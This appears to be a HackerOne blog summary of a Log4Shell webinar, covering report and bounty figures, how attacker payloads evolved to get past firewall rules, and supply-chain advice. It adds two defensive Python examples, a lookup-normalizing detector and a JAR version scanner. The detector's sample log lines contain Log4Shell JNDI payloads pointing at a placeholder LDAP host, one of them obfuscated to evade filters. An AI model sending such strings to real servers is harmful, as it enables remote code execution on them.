HackerOne

Log4Shell: Attack Evolution

Log4J webinar with Chris Evans and Jobert Abma

For many security teams, the holiday season was spoiled by the challenging remediation of Log4Shell. The affected Log4j software is ubiquitous in web applications, making this one of the most widespread vulnerabilities of all time.

HackerOne has unique visibility into the global response to Log4Shell, seeing in real time how organizations responded and remediated. Last week, HackerOne’s CISO Chris Evans and Co-founder Jobert Abma shared findings from our platform.

Below is a summary of their presentation and key insights from HackerOne’s platform data.


Submission Volume and Rewards

Hackers have submitted over 2,000 Log4Shell reports to over 400 of our customers. The majority of reports were made in the first 14 days after the public disclosure of Log4Shell. Since then, submissions have decreased significantly, suggesting the immediate disruption from Log4Shell is waning. However, we caution against assuming the threat is gone. Given the ubiquity of Log4j, we expect vulnerabilities will continue to be discovered and exploited across 2022.

As of today, a total of $607,000 in bounties have been awarded on the HackerOne platform for Log4Shell vulnerabilities. Of that total, $78,000 were bonuses specifically offered by customer programs for Log4Shell. 

Real-world impact

Log4Shell is a critical vulnerability and has been given a CVSS 10.0, the highest possible base score.

Based on reports received by our customers, the real-world threat of Log4Shell matches that score. Once triaged, 75% of submissions retained a 10.0 rating. The remaining 25% of reports were downgraded in severity due to environmental factors.

Adaptability of Hackers

The severity of Log4Shell, combined with Log4j’s ubiquity, meant that attackers were motivated to quickly exploit this vulnerability.

It’s common to see attackers sharing exploits and payloads on forums and other criminal communities. This allows attackers to start exploitation quickly and, by enabling essentially any attacker to copy-paste an exploit, lowers the required skill. As attackers gain familiarity and experience with a vulnerability, their attacks improve.

We saw that the initial payloads being used were very simple. In response to widespread probing and attacks, CDNs and large organizations deployed rules to their web application firewalls to identify and block these simple payloads. 

Attacks quickly evolved to avoid these rules - adding data exfiltration, using uncommon ports, and other clever adaptations. By December 20th, 90% of payloads had evolved in complexity to evade blocks, creating a cat-and-mouse game.

Your defenses cannot be static - they too must evolve along with attacks. Keeping up with the global criminal community is a challenge for any individual security team. A unique advantage of using the crowdsourced ethical hacking community is that you can leverage the same ingenuity and speed for your defenses. 
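The cat-and-mouse game described above comes down to one property of the early blocking rules: they matched a literal string, while Log4j's own lookup syntax lets the same request be written in many equivalent forms. The detection logic below is an added example, not code from the HackerOne presentation or platform; it normalizes Log4j's documented `${lower:...}`, `${upper:...}` and `${name:key:-default}` lookups before matching, and runs a first-generation literal rule beside the normalized rule over a few constructed log lines (the hostnames are placeholders).

```python
import re

# Constructed sample log lines (not from the HackerOne post); hosts are placeholders.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "${jndi:ldap://placeholder.example/a}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${${lower:J}${upper:n}di:${::-l}dap://placeholder.example/a}"',
]

# An innermost ${...} lookup: its body contains no further '$', '{' or '}'.
INNERMOST_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
JNDI_AFTER_NORMALIZATION = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def resolve_lookup(match):
    """Reduce one innermost lookup using Log4j's documented syntax.

    Handles ${lower:x}, ${upper:x} and the ${name:key:-default} default-value
    form; anything else (including ${jndi:...} itself) is left untouched so
    the detection regex can see it.
    """
    body = match.group(1)
    if ":-" in body:                      # ${...:-default} evaluates to its default
        return body.split(":-", 1)[1]
    prefix, sep, rest = body.partition(":")
    if sep and prefix.strip().lower() == "lower":
        return rest.lower()
    if sep and prefix.strip().lower() == "upper":
        return rest.upper()
    return match.group(0)                 # unknown lookup: keep as-is


def normalize_lookups(text, max_rounds=20):
    """Repeatedly collapse innermost lookups until the string stops changing."""
    for _ in range(max_rounds):
        reduced = INNERMOST_LOOKUP.sub(resolve_lookup, text)
        if reduced == text:
            break
        text = reduced
    return text


def naive_match(line):
    """The first-generation WAF rule: a case-insensitive literal substring."""
    return "${jndi:" in line.lower()


def detect(line):
    """Normalize first, then match: catches nested and case-shifted forms."""
    return bool(JNDI_AFTER_NORMALIZATION.search(normalize_lookups(line)))


def scan(lines):
    """Return (index, naive_hit, normalized_hit) for every line either rule flags."""
    results = []
    for i, line in enumerate(lines):
        naive, normalized = naive_match(line), detect(line)
        if naive or normalized:
            results.append((i, naive, normalized))
    return results


if __name__ == "__main__":
    for idx, naive, normalized in scan(SAMPLE_LOG_LINES):
        literal = "hit" if naive else "miss"
        norm = "hit" if normalized else "miss"
        print(f"line {idx}: literal rule={literal} normalized rule={norm}")
```

The design point is the normalization step rather than the final regex: the literal rule and the normalized rule agree on the plain second line, but only the normalized rule flags the third, because it reduces the nested lookups to the same canonical form before matching. A production detector would feed the normalized string to its existing rules rather than maintaining a growing list of spelling variants.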

Asset Management 

Asset management is a foundational part of a mature security posture and is often the starting point for incident response. However, visibility alone is not sufficient. 

After HackerOne completed our internal remediation process, we offered a $25,000 bonus for Log4Shell reports through our own bug bounty program. Our offering was fruitful, resulting in a confirmed report showing that a payload could be exploited in one of our third-party cloud providers.

Securing your entire supply chain requires multiple layers of defense. Scanning tools are a good starting point, allowing you to fingerprint vulnerable software across your infrastructure, including dependencies and third-party network infrastructure. In cases where you cannot directly investigate your supply chain components, contact those vendors to verify they are remediating. We also recommend offering bonuses through your bug bounty program as an incentive to improve confidence that your remediation was successful.
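The fingerprinting the paragraph above recommends is straightforward to implement for Log4j because log4j-core JARs carry two stable markers: the `JndiLookup.class` entry that implements the vulnerable lookup and a Maven `pom.properties` file that records the version. The scanner below is an added example, not HackerOne's tooling; it walks a directory tree, checks every archive for both markers, and recurses into archives nested inside archives, since fat JARs and WARs are where inventory tools most often miss a copy. The "first fixed version" threshold of 2.15.0 is an assumption taken from the original Log4Shell fix and should be updated from the vendor advisory; the fixture JARs are constructed in a temporary directory and contain placeholder bytes, not real bytecode.

```python
import io
import os
import re
import tempfile
import zipfile
from pathlib import Path

# Entry paths inside a log4j-core JAR (the artifact layout Apache ships).
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
LOG4J_CORE_POM = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
# Threshold assumption: the original Log4Shell fix shipped in log4j-core 2.15.0.
# Later releases addressed follow-on issues, so take the current value from the vendor advisory.
FIRST_FIXED_VERSION = (2, 15, 0)


def parse_version(pom_properties_text):
    """Pull 'version=...' out of a Maven pom.properties body."""
    for line in pom_properties_text.splitlines():
        key, sep, value = line.partition("=")
        if sep and key.strip() == "version":
            return value.strip()
    return None


def version_key(version):
    """Numeric prefix of a version string for ordering: '2.0-beta9' -> (2, 0, 0)."""
    numbers = []
    for part in re.split(r"[.-]", version):
        if not part.isdigit():
            break
        numbers.append(int(part))
    numbers.extend([0] * (3 - len(numbers)))
    return tuple(numbers[:3])


def inspect_archive(zf, label, depth=0, max_depth=3):
    """Fingerprint one archive and recurse into archives nested inside it (fat JARs, WARs)."""
    findings = []
    names = set(zf.namelist())
    jndi_present = JNDI_LOOKUP_CLASS in names
    version = None
    if LOG4J_CORE_POM in names:
        version = parse_version(zf.read(LOG4J_CORE_POM).decode("utf-8", "replace"))
    if jndi_present or version is not None:
        # Lookup class present but version unknown: treat as vulnerable until proven otherwise.
        flagged = jndi_present and (version is None or version_key(version) < FIRST_FIXED_VERSION)
        findings.append({"archive": label, "version": version,
                         "jndi_lookup_present": jndi_present, "flagged": flagged})
    if depth < max_depth:
        for name in sorted(names):
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                try:
                    with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                        findings.extend(inspect_archive(inner, f"{label}!{name}", depth + 1, max_depth))
                except zipfile.BadZipFile:
                    continue
    return findings


def scan_tree(root):
    """Walk a directory tree and fingerprint every archive found."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in ARCHIVE_SUFFIXES:
            try:
                with zipfile.ZipFile(path) as zf:
                    findings.extend(inspect_archive(zf, str(path)))
            except zipfile.BadZipFile:
                continue
    return findings


def build_core_jar(version, with_pom=True):
    """Constructed fixture: a JAR shaped like log4j-core; the class entry holds placeholder bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        if with_pom:
            zf.writestr(LOG4J_CORE_POM,
                        f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        zf.writestr(JNDI_LOOKUP_CLASS, b"placeholder")
    return buf.getvalue()


def run_demo():
    """Build a constructed fixture tree, scan it and return (relative label, version, flagged) tuples."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "old-log4j-core.jar").write_bytes(build_core_jar("2.14.1"))
        (root / "fixed-log4j-core.jar").write_bytes(build_core_jar("2.17.1"))
        (root / "unknown-version.jar").write_bytes(build_core_jar(None, with_pom=False))
        fat = io.BytesIO()  # an application fat JAR bundling the old core under lib/
        with zipfile.ZipFile(fat, "w") as zf:
            zf.writestr("lib/log4j-core-2.14.1.jar", build_core_jar("2.14.1"))
        (root / "app.jar").write_bytes(fat.getvalue())
        prefix = str(root) + os.sep
        return [(f["archive"].replace(prefix, "", 1), f["version"], f["flagged"]) for f in scan_tree(root)]


if __name__ == "__main__":
    for label, version, flagged in run_demo():
        print(f"{'VULNERABLE' if flagged else 'ok        '} {label} version={version}")
```

Two choices matter for the asset-management use case. First, the scanner keys on the class entry rather than on the file name, so a renamed or shaded copy is still found, and an archive that carries the class but no version metadata is reported as vulnerable rather than silently skipped. Second, the nested-archive recursion is what turns a list of known JARs into an inventory of what is actually deployed, which is the gap between "visibility" and the confidence the paragraph above asks for.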

Watch the full presentation by Chris Evans and Jobert Abma
